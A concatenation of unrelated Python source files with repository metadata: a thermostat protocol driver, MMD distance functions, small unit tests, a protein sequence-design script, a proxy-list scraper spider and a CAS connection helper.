packet.set_command_data(value)
self._send(packet)
@property
def display_contrast(self):
data = self._get_mdi(24, 0)
return data[0]
@property
def communication_timeout(self):
"""
:return: seconds
"""
data = self._get_mdi(25, 1)
return data[0] << 8 | data[1]
def enable_communications_receiver(self, value):
packet = CommunicationsReceiverOnOff()
packet.set_command_data(value)
self._send(packet)
@property
def display_phone_number_on_fault(self):
"""
:return: THERMOSTAT_ENABLED or THERMOSTAT_DISABLED
"""
data = self._get_mdi(27, 0)
return int(_get_bit(data[0], 0))
@display_phone_number_on_fault.setter
def display_phone_number_on_fault(self, value):
packet = ForcePhoneNumberDisplay()
packet.set_command_data(value)
self._send(packet)
@property
def indoor_unit_node_type(self):
"""
:return: one of node_types.NODE_TYPE_* constants
"""
data = self._get_mdi(28, 0)
return data[0]
@property
def outdoor_unit_node_type(self):
"""
:return: one of node_types.NODE_TYPE_* constants
"""
data = self._get_mdi(29, 0)
return data[0]
@property
def humidification_capable(self):
"""
:return: THERMOSTAT_CAPABLE or THERMOSTAT_NOT_CAPABLE
"""
data = self._get_mdi(30, 0)
return int(_get_bit(data[0], 3))
@property
def dehumidification_capable(self):
"""
:return: THERMOSTAT_CAPABLE or THERMOSTAT_NOT_CAPABLE
"""
data = self._get_mdi(30, 0)
return int(_get_bit(data[0], 2))
@property
def independent_humidification_capable(self):
"""
:return: THERMOSTAT_CAPABLE or THERMOSTAT_NOT_CAPABLE
"""
data = self._get_mdi(30, 0)
return int(_get_bit(data[0], 1))
@property
def independent_dehumidification_capable(self):
"""
:return: THERMOSTAT_CAPABLE or THERMOSTAT_NOT_CAPABLE
"""
data = self._get_mdi(30, 0)
return int(_get_bit(data[0], 0))
@property
def allowed_schedule_profiles(self):
res = []
data = self._get_mdi(31, 0)
if _get_bit(data[0], 3): # 5-2
res += [THERMOSTAT_PROFILE_TYPE_5_2]
if _get_bit(data[0], 2): # 7-day
res += [THERMOSTAT_PROFILE_TYPE_7_DAY]
if _get_bit(data[0], 1): # 5-1-1
res += [THERMOSTAT_PROFILE_TYPE_5_1_1]
if _get_bit(data[0], 0): # Non Programmable
res += [THERMOSTAT_PROFILE_TYPE_NON_PROGRAMMABLE]
return res
@property
def allowed_schedule_intervals(self):
res = []
data = self._get_mdi(32, 0)
if _get_bit(data[0], 2): # 2 step
res += [THERMOSTAT_INTERVAL_TYPE_2_STEP]
if _get_bit(data[0], 1): # Non Programmable
res += [THERMOSTAT_INTERVAL_TYPE_NON_PROGRMMABLE]
if _get_bit(data[0], 0): # 4 step
res += [THERMOSTAT_INTERVAL_TYPE_4_STEP]
return res
@property
def critical_fault(self):
data = self._get_status_mdi(0, 0)
return data[0]
@property
def minor_fault(self):
data = self._get_status_mdi(1, 0)
return data[0]
@property
def operating_status(self):
"""
:return: one of THERMOSTAT_SYSTEM_STATUS_
"""
data = self._get_status_mdi(2, 0)
return data[0]
@operating_status.setter
def operating_status(self, value):
packet = SystemSwitchModify()
packet.set_command_data(value)
self._send(packet)
@property
def curtailment_status(self):
"""
:return: one of THERMOSTAT_CURTAILMENT_STATUS_* constants
"""
data = self._get_status_mdi(3, 0)
return data[0]
@property
def humidification_setpoint(self):
data = self._get_status_mdi(4, 0)
return data[0]
@humidification_setpoint.setter
def humidification_setpoint(self, value):
packet = HumidificationSetPointModify()
packet.set_command_data(value)
self._send(packet)
@property
def dehumidification_setpoint(self):
data = self._get_status_mdi(5, 0)
return data[0]
@dehumidification_setpoint.setter
def dehumidification_setpoint(self, value):
packet = DehumidificationSetPointModify()
packet.set_command_data(value)
self._send(packet)
@property
def working_setpoint(self):
data = self._get_status_mdi(6, 0)
return data[0]
@property
def display_temp(self):
    """Temperature currently shown on the thermostat display.

    The two status bytes form a 16-bit fixed-point value whose low
    nibble is tenths of a degree and whose upper bits are the integer
    part.

    :return: temperature as a float (integer part + tenths)
    """
    data = self._get_status_mdi(7, 1)
    value = data[0] << 8 | data[1]
    # Integer part lives above the low nibble.  The original
    # `value << 4 & 0xF` always produced 0 (a left shift clears the low
    # four bits); a right shift is required here.
    temp = value >> 4
    frac = (value & 0xF) / 10.0
    return temp + frac
@property
def heat_setpoint(self):
data = self._get_status_mdi(9, 0)
return data[0]
@heat_setpoint.setter
def heat_setpoint(self, value):
packet = HeatSetPointTemperatureModify()
packet.set_command_data(value)
self._send(packet)
@property
def cool_setpoint(self):
data = self._get_status_mdi(10, 0)
return data[0]
@cool_setpoint.setter
def cool_setpoint(self, value):
packet = CoolSetPointTemperatureModify()
packet.set_command_data(value)
self._send(packet)
@property
def daylight_savings(self):
"""
:return: THERMOSTAT_ENABLED or THERMOSTAT_DISABLED
"""
data = self._get_status_mdi(22, 0)
return int(_get_bit(data[0], 0))
@daylight_savings.setter
def daylight_savings(self, value):
packet = AdvanceRealTimeDayOverride()
packet.set_command_data(
bool(self.clock_lockout),
value,
self.gmt_offset,
self.date_time
)
self._send(packet)
@property
def clock_lockout(self):
"""
:return: THERMOSTAT_ENABLED or THERMOSTAT_DISABLED
"""
data = self._get_status_mdi(22, 0)
return int(_get_bit(data[0], 7))
@clock_lockout.setter
def clock_lockout(self, value):
packet = AdvanceRealTimeDayOverride()
packet.set_command_data(
value,
bool(self.daylight_savings),
self.gmt_offset,
self.date_time
)
self._send(packet)
@property
def gmt_offset(self):
    """Offset of the thermostat clock from GMT.

    :return: signed offset decoded from status MDI byte 23
    """
    data = self._get_status_mdi(23, 0)
    # NOTE(review): `data[0] / 4` is true division in Python 3, so a
    # float is handed to TwosCompliment.decode.  If the raw byte stores
    # quarter-hour units, decoding the byte first and then dividing
    # (TwosCompliment.decode(data[0], 8) / 4) is probably what was
    # intended -- confirm against the protocol spec before changing.
    return TwosCompliment.decode(data[0] / 4, 8)
@gmt_offset.setter
def gmt_offset(self, value):
packet = AdvanceRealTimeDayOverride()
packet.set_command_data(
bool(self.clock_lockout),
bool(self.daylight_savings),
value,
self.date_time
)
self._send(packet)
@property
def date_time(self):
    """Current thermostat clock as a ``datetime.datetime``.

    Returns ``None`` when any of the clock fields still reads 0xFF
    (i.e. the clock has not been set).  The stored year is an offset
    from 2000 and the stored month is zero-based.
    """
    fields = [
        self._get_status_mdi(idx, 0)[0]
        for idx in (11, 25, 26, 27, 12, 13, 14)
    ]
    if any(f == 0xFF for f in fields):
        return None
    _weekday, year, month, day, hour, minute, second = fields
    return datetime.datetime(
        year=year + 2000,
        month=month + 1,
        day=day,
        hour=hour,
        minute=minute,
        second=second,
    )
@date_time.setter
def date_time(self, value):
packet = RealTimeDayOverride()
packet.set_command_data(value)
self._send(packet)
@property
def programmable_hold(self):
"""
:return: THERMOSTAT_ENBLED or THERMOSTAT_DISABLED
"""
data = self._get_status_mdi(15, 0)
return int(_get_bit(data[0], 3))
@property
def startup_hold(self):
"""
:return: THERMOSTAT_ENBLED or THERMOSTAT_DISABLED
"""
data = self._get_status_mdi(15, 0)
return int(_get_bit(data[0], 2))
@property
def temporary_hold(self):
"""
:return: THERMOSTAT_ENBLED or THERMOSTAT_DISABLED
"""
data = self._get_status_mdi(15, 0)
return int(_get_bit(data[0], 1))
@temporary_hold.setter
def temporary_hold(self, value):
packet = SetPointTempAndTemporaryHold()
packet.set_command_data(value)
self._send(packet)
@property
def permanent_hold(self):
"""
:return: THERMOSTAT_ENBLED or THERMOSTAT_DISABLED
"""
data = self._get_status_mdi(15, 0)
return int(_get_bit(data[0], 0))
@permanent_hold.setter
def permanent_hold(self, value):
packet = PermanentSetPointTempHoldModify()
packet.set_command_data(value)
self._send(packet)
def hold_override(self):
packet = HoldOverride()
packet.set_command_data(THERMOSTAT_DISABLED)
self._send(packet)
@property
def temporary_hold_remaining(self):
"""
:return: minutes
"""
data = self._get_status_mdi(16, 1)
return data[0] << 8 | data[1]
@temporary_hold_remaining.setter
def temporary_hold_remaining(self, value):
packet = SetPointTempTimeHold()
packet.set_command_data(self.working_setpoint, value)
self._send(packet)
@property
def dehumidification_demand(self):
"""
:return:
"""
data = self._get_status_mdi(18, 0)
return data[0] * 0.5
@dehumidification_demand.setter
def dehumidification_demand(self, value):
timer = datetime.time(minute=1, second=0)
packet = DehumidificationDemand()
packet.set_command_data(timer, value)
self._send(packet)
@property
def humidification_demand(self):
"""
:return:
"""
data = self._get_status_mdi(19, 0)
return data[0] * 0.5
@humidification_demand.setter
def humidification_demand(self, value):
timer = datetime.time(minute=1, second=0)
packet = HumidificationDemand()
packet.set_command_data(timer, value)
self._send(packet)
@property
def heat_demand(self):
"""
:return:
"""
data = self._get_status_mdi(20, 0)
return data[0] * 0.5
@heat_demand.setter
def heat_demand(self, value):
timer = datetime.time(minute=1, second=0)
packet = HeatDemand()
packet.set_command_data(timer, value)
self._send(packet)
@property
def cool_demand(self):
"""
:return:
"""
data = self._get_status_mdi(21, 0)
return data[0] * 0.5
@cool_demand.setter
def cool_demand(self, value):
timer = datetime.time(minute=1, second=0)
packet = CoolDemand()
packet.set_command_data(timer, value)
self._send(packet)
@property
def fan_demand(self):
"""
:return:
"""
data = self._get_status_mdi(22, 0)
return data[0] * 0.5
def fan_demand_manual(self, value):
timer = datetime.time(minute=1, second=0)
packet = FanDemand()
packet.set_command_data(timer, _FAN_DEMAND_MANUAL, value)
self._send(packet)
fan_demand_manual = property(fset=fan_demand_manual)
def fan_demand_cool(self, value):
timer = datetime.time(minute=1, second=0)
packet = FanDemand()
packet.set_command_data(timer, _FAN_DEMAND_COOL, value)
self._send(packet)
fan_demand_cool = property(fset=fan_demand_cool)
def fan_demand_heat(self, value):
timer = datetime.time(minute=1, second=0)
packet = FanDemand()
packet.set_command_data(timer, _FAN_DEMAND_HEAT, value)
self._send(packet)
fan_demand_heat = property(fset=fan_demand_heat)
def fan_demand_aux_heat(self, value):
timer = datetime.time(minute=1, second=0)
packet = FanDemand()
packet.set_command_data(timer, _FAN_DEMAND_AUX_HEAT, value)
self._send(packet)
fan_demand_aux_heat = property(fset=fan_demand_aux_heat)
def fan_demand_emergency_heat(self, value):
timer = datetime.time(minute=1, second=0)
packet = FanDemand()
packet.set_command_data(timer, _FAN_DEMAND_EMERGENCY_HEAT, value)
self._send(packet)
fan_demand_emergency_heat = property(fset=fan_demand_emergency_heat)
def fan_demand_defrost(self, value):
timer = datetime.time(minute=1, second=0)
packet = FanDemand()
packet.set_command_data(timer, _FAN_DEMAND_DEFROST, value)
self._send(packet)
fan_demand_defrost = property(fset=fan_demand_defrost)
@property
def emergency_heat_demand(self):
"""
:return:
"""
data = self._get_status_mdi(23, 0)
return data[0] * 0.5
@emergency_heat_demand.setter
def emergency_heat_demand(self, value):
timer = datetime.time(minute=1, second=0)
packet = BackUpHeatDemand()
packet.set_command_data(timer, value)
self._send(packet)
@property
def aux_heat_demand(self):
"""
:return:
"""
data = self._get_status_mdi(24, 0)
return data[0] * 0.5
@aux_heat_demand.setter
def aux_heat_demand(self, value):
timer = datetime.time(minute=1, second=0)
packet = AuxHeatDemand()
packet.set_command_data(timer, value)
self._send(packet)
@property
def relative_humidity(self):
"""
:return:
"""
data = self._get_status_mdi(28, 0)
return data[0]
@property
def vacation_mode(self):
"""
:return: THERMOSTAT_ENABLED or THERMOSTAT_DISABLED
"""
data = self._get_status_mdi(29, 0)
return int(data[0])
@vacation_mode.setter
def vacation_mode(self, value):
packet = VacationMode()
packet.set_command_data(value)
self._send(packet)
def vacation_mode_setpoints(self, heat_setpoint, cool_setpoint):
packet = VacationMode()
packet.set_command_data(self.vacation_mode, heat_setpoint, cool_setpoint)
self._send(packet)
@property
def fan_mode_setting(self):
"""
:return: one of THERMOSTAT_FAN_STATUS_* constants
"""
data = self._get_status_mdi(30, 0)
return data[0]
@fan_mode_setting.setter
def fan_mode_setting(self, value):
packet = FanKeySelection()
packet.set_command_data(value)
self._send(packet)
def restore_factory_defaults(self):
packet = RestoreFactoryDefaults()
packet.set_command_data()
self._send(packet)
THERMOSTAT_SUBSYSTEM_INSTALLATION_TEST_START = 0x01
THERMOSTAT_SUBSYSTEM_INSTALLATION_TEST_STOP = 0x00
def subsystem_installation_test(self, state):
"""
:param state: one of THERMOSTAT_SUBSYSTEM_INSTALLATION_TEST_* constants
:return:
"""
packet = SubsystemInstallationTest()
packet.set_command_data(state)
self._send(packet)
def set_display_text(
self,
area_id,
duration,
blink,
reverse,
text_id,
text
):
"""
:param area_id: 0 - 7
:param duration: 0.0 - 7.5
:param blink: True/False
:param reverse: True/False
:param text_id: 0 - 7
:param text:
:return:
"""
packet = CustomMessageAreaDisplayData()
packet.set_command_data(
area_id,
duration,
blink,
reverse,
text_id,
text
)
self._send(packet)
# ReversingValveConfig,
# HumDehumConfig
| 26.212549 | 81 | 0.611502 |
df272570f222a6e7598bb9c9110ef9a702ebe7c3 | 2,276 | py | Python | code/distance/mmd_numpy_sklearn.py | lw0517/transferlearning | 230df8850b09f896a799ad865072c0164f45fadc | [
"MIT"
] | 9,657 | 2017-05-01T03:29:35.000Z | 2022-03-31T21:25:30.000Z | code/distance/mmd_numpy_sklearn.py | xiaohuihui-com/transferlearning | 17583db86db19709ff483a24590f0d5b88e25fe5 | [
"MIT"
] | 262 | 2017-09-16T09:33:02.000Z | 2022-03-30T05:08:45.000Z | code/distance/mmd_numpy_sklearn.py | xiaohuihui-com/transferlearning | 17583db86db19709ff483a24590f0d5b88e25fe5 | [
"MIT"
] | 3,273 | 2017-05-01T06:28:31.000Z | 2022-03-31T09:57:48.000Z | # Compute MMD (maximum mean discrepancy) using numpy and scikit-learn.
import numpy as np
from sklearn import metrics
def mmd_linear(X, Y):
    """MMD with the linear kernel k(x, y) = <x, y>.

    Uses the reformulated (faster) identity: for the linear kernel the
    squared MMD reduces to ||mean(X) - mean(Y)||^2, which avoids forming
    the full Gram matrices of the naive version.

    Arguments:
        X {[n_sample1, dim]} -- [X matrix]
        Y {[n_sample2, dim]} -- [Y matrix]

    Returns:
        [scalar] -- [MMD value]
    """
    mean_gap = X.mean(0) - Y.mean(0)
    return mean_gap.dot(mean_gap.T)
def mmd_rbf(X, Y, gamma=1.0):
    """MMD with the RBF (Gaussian) kernel k(x, y) = exp(-gamma * ||x-y||^2 / 2).

    Arguments:
        X {[n_sample1, dim]} -- [X matrix]
        Y {[n_sample2, dim]} -- [Y matrix]

    Keyword Arguments:
        gamma {float} -- [kernel parameter] (default: {1.0})

    Returns:
        [scalar] -- [MMD value]
    """
    k_xx = metrics.pairwise.rbf_kernel(X, X, gamma)
    k_yy = metrics.pairwise.rbf_kernel(Y, Y, gamma)
    k_xy = metrics.pairwise.rbf_kernel(X, Y, gamma)
    return k_xx.mean() + k_yy.mean() - 2 * k_xy.mean()
def mmd_poly(X, Y, degree=2, gamma=1, coef0=0):
    """MMD with the polynomial kernel k(x, y) = (gamma <X, Y> + coef0)^degree.

    Arguments:
        X {[n_sample1, dim]} -- [X matrix]
        Y {[n_sample2, dim]} -- [Y matrix]

    Keyword Arguments:
        degree {int} -- [degree] (default: {2})
        gamma {int} -- [gamma] (default: {1})
        coef0 {int} -- [constant item] (default: {0})

    Returns:
        [scalar] -- [MMD value]
    """
    k_xx = metrics.pairwise.polynomial_kernel(X, X, degree, gamma, coef0)
    k_yy = metrics.pairwise.polynomial_kernel(Y, Y, degree, gamma, coef0)
    k_xy = metrics.pairwise.polynomial_kernel(X, Y, degree, gamma, coef0)
    return k_xx.mean() + k_yy.mean() - 2 * k_xy.mean()
if __name__ == '__main__':
    # Quick smoke test on two small integer matrices with different
    # sample counts (3x3 vs 4x3); expected values are noted inline.
    a = np.arange(1, 10).reshape(3, 3)
    b = [[7, 6, 5], [4, 3, 2], [1, 1, 8], [0, 2, 5]]
    b = np.array(b)
    print(a)
    print(b)
    print(mmd_linear(a, b))  # 6.0
    print(mmd_rbf(a, b))  # 0.5822
    print(mmd_poly(a, b))  # 2436.5
| 29.558442 | 92 | 0.554921 |
c231f9aa2b633e77d6ede57e27199c53e08e88e7 | 885 | py | Python | tests/test_shard.py | DolphDev/pynationstates-async | b632256636dadeb3abfd5b9dcfea6b72a9beda54 | [
"MIT"
] | null | null | null | tests/test_shard.py | DolphDev/pynationstates-async | b632256636dadeb3abfd5b9dcfea6b72a9beda54 | [
"MIT"
] | null | null | null | tests/test_shard.py | DolphDev/pynationstates-async | b632256636dadeb3abfd5b9dcfea6b72a9beda54 | [
"MIT"
] | null | null | null | import unittest
import nationstates_async as core
class ShardTest(unittest.TestCase):
    """Unit tests for the ``Shard`` helper class."""

    def test_shard(self):
        # _get_main_value() should echo the shard's name.
        shard = core.Shard("numnations")
        self.assertEqual(shard._get_main_value(), "numnations")

    def test_shard_tail_gen(self):
        shard = core.Shard("dispatch", dispatchid="1")
        self.assertEqual(shard.tail_gen(), {"dispatchid": "1"})

    def test_shard_repr(self):
        # repr() must produce a string with and without keyword args.
        self.assertIsInstance(repr(core.Shard("test")), str)
        self.assertIsInstance(repr(core.Shard("test", test="test")), str)

    def test_shard_ShardError(self):
        # A None shard name is rejected with ValueError.
        self.assertRaises(ValueError, core.Shard, None)

    def test_shard_string(self):
        # Stringification and name access must not raise.
        try:
            str(core.Shard("TEST"))
            core.Shard("TEST").name
        except:
            self.fail()

    def test_shard_eq(self):
        # Shards with the same name compare equal.
        self.assertEqual(core.Shard("TEST"), core.Shard("TEST"))
d90b9d9a2c24180c78639f68097d6c11e0ed8d0a | 883 | py | Python | test.py | PGE383-HPC-Students/assignment14 | 76591df940abff818617e9878798ba40bea00fa8 | [
"MIT"
] | null | null | null | test.py | PGE383-HPC-Students/assignment14 | 76591df940abff818617e9878798ba40bea00fa8 | [
"MIT"
] | null | null | null | test.py | PGE383-HPC-Students/assignment14 | 76591df940abff818617e9878798ba40bea00fa8 | [
"MIT"
] | null | null | null | #/usr/bin/env python
#
# Copyright 2020-2021 John T. Foster
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os.path
import unittest
class TestSolution(unittest.TestCase):
    """Verify that the assignment produced both expected plot images."""

    def _assert_plot_exists(self, name):
        # Helper: the plot file must exist in the working directory.
        assert os.path.isfile(name)

    def test_plot_0(self):
        self._assert_plot_exists('plot_0.png')

    def test_plot_1(self):
        self._assert_plot_exists('plot_1.png')
if __name__ == '__main__':
unittest.main()
| 27.59375 | 74 | 0.722537 |
12f079c8867b07599ae62ec24d2d300a471fdec1 | 5,679 | py | Python | nnef/design_sample.py | lahplover/nnef | dcabf31337e5849593f343e6502fe0b8dc20452e | [
"MIT"
] | 2 | 2021-04-30T06:07:49.000Z | 2021-06-30T06:47:00.000Z | nnef/design_sample.py | lahplover/nnef | dcabf31337e5849593f343e6502fe0b8dc20452e | [
"MIT"
] | null | null | null | nnef/design_sample.py | lahplover/nnef | dcabf31337e5849593f343e6502fe0b8dc20452e | [
"MIT"
] | null | null | null | import numpy as np
import pandas as pd
import torch
from physics.protein_os import Protein
import options
from physics.anneal import AnnealSeq
import os
import h5py
from tqdm import tqdm
from utils import test_setup
"""
do mutations & design for a sample of protein backbones.
"""
#################################################
parser = options.get_fold_parser()
args = options.parse_args_and_arch(parser)
device, model, energy_fn, ProteinBase = test_setup(args)
torch.set_grad_enabled(False)
#################################################
def load_protein(root_dir, pdb_id, mode, device, args,
                 amino_acids_csv='data/amino_acids.csv'):
    """Load a protein's sequence and bead coordinates from CSV files.

    Reads ``{root_dir}/{pdb_id}_bead.csv`` and maps each residue's
    3-letter code to a zero-based index via the amino-acid table.

    :param root_dir: directory containing ``{pdb_id}_bead.csv``
    :param pdb_id: PDB identifier (file-name stem)
    :param mode: 'CA' for alpha-carbon coordinates, 'CB' for beta-carbon
    :param device: torch device for the returned tensors
    :param args: unused; kept for call-site compatibility
    :param amino_acids_csv: path to the residue-name/index table
        (generalized from the previously hard-coded relative path)
    :return: tuple ``(seq, coords, profile)`` -- array of 3-letter
        residue names, float tensor of shape (n, 3), long tensor of
        residue indices
    :raises ValueError: if mode is not 'CA' or 'CB'
    """
    amino_acids = pd.read_csv(amino_acids_csv)
    # Table stores 1-based indices; shift to 0-based for the model.
    vocab = {x.upper(): y - 1 for x, y in zip(amino_acids.AA3C, amino_acids.idx)}

    df_beads = pd.read_csv(f'{root_dir}/{pdb_id}_bead.csv')
    seq = df_beads['group_name'].values
    seq_id = df_beads['group_name'].apply(lambda x: vocab[x]).values

    if mode == 'CA':
        coords = df_beads[['xca', 'yca', 'zca']].values
    elif mode == 'CB':
        coords = df_beads[['xcb', 'ycb', 'zcb']].values
    else:
        raise ValueError('mode should be CA / CB.')

    coords = torch.tensor(coords, dtype=torch.float, device=device)
    profile = torch.tensor(seq_id, dtype=torch.long, device=device)
    return seq, coords, profile
# Dataset root: which design set to run on (alternatives kept for reference).
# root_dir = 'data/design/cullpdb_val_sample'
root_dir = 'data/design/cullpdb_val_deep'
# root_dir = 'data/design/ref'

protein_sample = pd.read_csv(f'{root_dir}/sample.csv')
pdb_selected = protein_sample['pdb'].values
# Randomize the processing order of the selected proteins.
np.random.shuffle(pdb_selected)

design_engine = args.fold_engine
mode = args.mode
exp_id = args.load_exp[-5:]
save_dir = args.save_dir
# Create the per-experiment output directory if it does not exist yet.
if not os.path.exists(f'{root_dir}/{save_dir}'):
    os.mkdir(f'{root_dir}/{save_dir}')
for pdb_id in tqdm(pdb_selected):
    # Skip proteins that already have results, so interrupted runs can resume.
    if os.path.exists(f'{root_dir}/{save_dir}/{pdb_id}_profile.h5'):
        continue
    seq, coords_native, profile = load_protein(root_dir, pdb_id, mode, device, args)
    # skip long sequences
    # if len(seq) > 400:
    #     continue
    protein_native = Protein(seq, coords_native, profile)
    energy_native = protein_native.get_energy(energy_fn).item()
    print('energy_native:', energy_native)
    residue_energy = protein_native.get_residue_energy(energy_fn)
    print(profile)
    print(residue_energy)
    # Work on cloned tensors so the native structure/profile stay untouched.
    protein = Protein(seq, coords_native.clone(), profile.clone())
    if args.random_init:
        # Start the design from a uniformly random sequence instead of native.
        protein.profile = torch.randint(0, 20, profile.size(), device=profile.device)
    energy_init = protein.get_energy(energy_fn).item()
    print('energy_init:', energy_init)
    if design_engine != 'mutation':
        # simulated annealing over the sequence; step count scales with length
        torch.set_grad_enabled(False)
        anneal_steps = int(args.L * (seq.shape[0] / 50.0))
        annealer = AnnealSeq(energy_fn, protein, seq_move_type=args.seq_move_type,
                             T_max=args.T_max, T_min=args.T_min, L=anneal_steps)
        annealer.run()
        profile_best = annealer.x_best
        energy_best = annealer.energy_best
        sample = annealer.sample
        sample_energy = annealer.sample_energy
        # Sequence recovery: fraction of designed residues matching native.
        profile_native = protein_native.profile
        recovery = (profile_native.cpu().numpy() == profile_best.cpu().numpy())
        print(pdb_id, recovery.sum(), float(recovery.sum()) / protein.profile.size(0))
        # save sampled structures
        sample_profile = [profile_native.cpu(), profile_best.cpu()] + sample
        sample_profile = torch.stack(sample_profile, dim=0).numpy()
        with h5py.File(f'{root_dir}/{save_dir}/{pdb_id}_profile.h5', 'w') as f:
            profile_dtype = 'f4' if args.seq_type == 'profile' else 'i1'
            dset = f.create_dataset("profile", shape=sample_profile.shape, data=sample_profile, dtype=profile_dtype)
        # Energies aligned with the saved profiles: native, best, then samples.
        sample_energy = [energy_native, energy_best] + sample_energy
        pd.DataFrame({'sample_energy': sample_energy}).to_csv(f'{root_dir}/{save_dir}/{pdb_id}_energy.csv', index=False)
    else:
        # Exhaustive single-point mutation scan: energy of all 20 residue
        # types at every position, restoring the wild type afterwards.
        torch.set_grad_enabled(False)
        n = protein.profile.size(0)
        sample_energy = np.zeros((n, 20))
        for i in tqdm(range(n)):
            res_i = protein.profile[i].item()
            for j in range(20):
                protein.profile[i] = j
                sample_energy[i, j] = protein.get_energy(energy_fn).item()
            # Restore the wild-type residue before moving to the next position.
            protein.profile[i] = res_i
        # energy_best = sample_energy.min()
        assert(torch.sum(protein_native.profile == protein.profile) == n)
        profile = protein.profile.cpu().numpy()
        # Recovery: positions where the lowest-energy mutant is the wild type.
        profile_min = np.argmin(sample_energy, axis=1)
        recovery = (profile == profile_min)
        print(pdb_id, recovery.sum(), float(recovery.sum()) / n, recovery)
        # df_profile = pd.read_csv(f'{root_dir}/{pdb_id}_profile.csv')
        # f_profile = df_profile[[f'aa{i}' for i in range(20)]].values
        # kT = 0.01
        # energy_min = np.min(sample_energy, axis=1)
        # delta_energy = sample_energy - energy_min[:, None]
        # p = np.exp(-delta_energy / kT)
        # weighted_p = np.sum(p * f_profile, axis=1) / np.sum(p, axis=1)
        # weighted_recovery = weighted_p.mean()
        # print(np.sum(p, axis=1), weighted_recovery)
        with h5py.File(f'{root_dir}/{save_dir}/{pdb_id}_profile.h5', 'w') as f:
            dset = f.create_dataset("wt_residue_energy", shape=residue_energy.shape, data=residue_energy, dtype='f4')
            dset = f.create_dataset("mutant_energy", shape=sample_energy.shape, data=sample_energy, dtype='f4')
            dset = f.create_dataset("seq", shape=profile.shape, data=profile, dtype='f4')
            # dset = f.create_dataset("profile", shape=f_profile.shape, data=f_profile, dtype='f4')
5e194563bbccd614c6118296f7c6047a96c166cb | 2,310 | py | Python | ipproxytool/spiders/proxy/gatherproxy.py | k1tCooler/himasoft | 546f11aafa9f17c36fc0f3bd98f3df5e4fe154b1 | [
"MIT"
] | null | null | null | ipproxytool/spiders/proxy/gatherproxy.py | k1tCooler/himasoft | 546f11aafa9f17c36fc0f3bd98f3df5e4fe154b1 | [
"MIT"
] | 3 | 2021-03-18T20:24:09.000Z | 2021-12-13T19:44:52.000Z | ipproxytool/spiders/proxy/gatherproxy.py | k1tCooler/himasoft | 546f11aafa9f17c36fc0f3bd98f3df5e4fe154b1 | [
"MIT"
] | null | null | null | # coding=utf-8
import json
import random
import re
import requests
from proxy import Proxy
from .basespider import BaseSpider
class GatherproxySpider(BaseSpider):
    """Spider that scrapes proxy servers from gatherproxy.com.

    Proxy entries are embedded in the page as ``gp.insertPrx({...})``
    JavaScript calls whose argument is a JSON object.
    """

    name = 'gatherproxy'

    def __init__(self, *a, **kwargs):
        super(GatherproxySpider, self).__init__(*a, **kwargs)
        self.urls = [
            'http://gatherproxy.com/',
            'http://www.gatherproxy.com/proxylist/anonymity/?t=Anonymous',
            'http://gatherproxy.com/proxylist/country/?c=China',
        ]
        self.headers = {
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Accept-Encoding': 'gzip, deflate',
            'Accept-Language': 'en-US,en;q=0.5',
            'Connection': 'keep-alive',
            'Host': 'www.gatherproxy.com',
            'Upgrade-Insecure-Requests': '1',
            'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:52.0) Gecko/20100101 Firefox/52.0'
        }
        # self.proxies = self.get_proxy()
        self.init()

    def parse_page(self, response):
        """Extract proxy entries embedded as gp.insertPrx(...) JSON blobs."""
        # Raw string (was an invalid '\(' escape in a plain string) and an
        # escaped dot so only the literal "gp.insertPrx" call matches.
        pattern = re.compile(r'gp\.insertPrx\((.*?)\)', re.S)
        items = re.findall(pattern, response.body)
        for item in items:
            data = json.loads(item)
            # The port is published as a hexadecimal string.
            port = data.get('PROXY_PORT')
            port = str(int(port, 16))
            proxy = Proxy()
            proxy.set_value(
                ip=data.get('PROXY_IP'),
                port=port,
                country=data.get('PROXY_COUNTRY'),
                anonymity=data.get('PROXY_TYPE'),
                source=self.name,
            )
            self.add_proxy(proxy=proxy)

    def get_proxy(self):
        """Fetch a random previously-stored proxy for this spider.

        :return: a requests-style ``{'http': ...}`` proxies dict, or
            None when the local proxy service has nothing / fails.
        """
        try:
            url = 'http://127.0.0.1:8000/?name={0}'.format(self.name)
            r = requests.get(url=url)
            if r.text is not None and r.text != '':
                data = json.loads(r.text)
                if len(data) > 0:
                    proxy = random.choice(data)
                    ip = proxy.get('ip')
                    port = proxy.get('port')
                    address = '%s:%s' % (ip, port)
                    proxies = {
                        'http': 'http://%s' % address
                    }
                    return proxies
        except Exception:
            # Narrowed from a bare `except:`; still best-effort (returns
            # None on failure) but no longer swallows SystemExit or
            # KeyboardInterrupt.
            return None
| 31.216216 | 110 | 0.500433 |
36cb5ffc63ed294cf2159a4fc777d17b8cddca33 | 620 | py | Python | tests/swat_config.py | jld23/sasoptpy | f96911f04d6c0c01fce902f1f995935583df69a8 | [
"Apache-2.0"
] | 20 | 2017-12-22T18:29:55.000Z | 2021-09-12T15:04:39.000Z | tests/swat_config.py | jld23/sasoptpy | f96911f04d6c0c01fce902f1f995935583df69a8 | [
"Apache-2.0"
] | 9 | 2019-01-24T14:52:33.000Z | 2022-03-16T14:14:35.000Z | tests/swat_config.py | jld23/sasoptpy | f96911f04d6c0c01fce902f1f995935583df69a8 | [
"Apache-2.0"
] | 12 | 2017-12-22T19:37:16.000Z | 2021-07-30T21:04:03.000Z |
import os
from swat import CAS
import warnings
def create_cas_connection():
    """Create a CAS session from environment variables.

    Reads CASHOST/CASPORT for the server address and authenticates with
    either an authinfo file (AUTHINFO) or username/password
    (CASUSERNAME/CASPASSWORD), in that order of preference.

    :return: a connected ``CAS`` instance, or ``None`` (after emitting a
        ``RuntimeWarning``) when the environment is incomplete.
    """
    host = os.environ.get('CASHOST')
    port = os.environ.get('CASPORT')
    # Previously a missing CASPORT raised TypeError from int(None) before
    # the graceful warning path could run; now incomplete settings fall
    # through to the documented None result.
    if host and port:
        cas_args = {'host': host, 'port': int(port)}
        authinfo = os.environ.get('AUTHINFO', None)
        if authinfo:
            cas_args['authinfo'] = authinfo
            return CAS(**cas_args)
        username = os.environ.get('CASUSERNAME', None)
        if username:
            cas_args['username'] = username
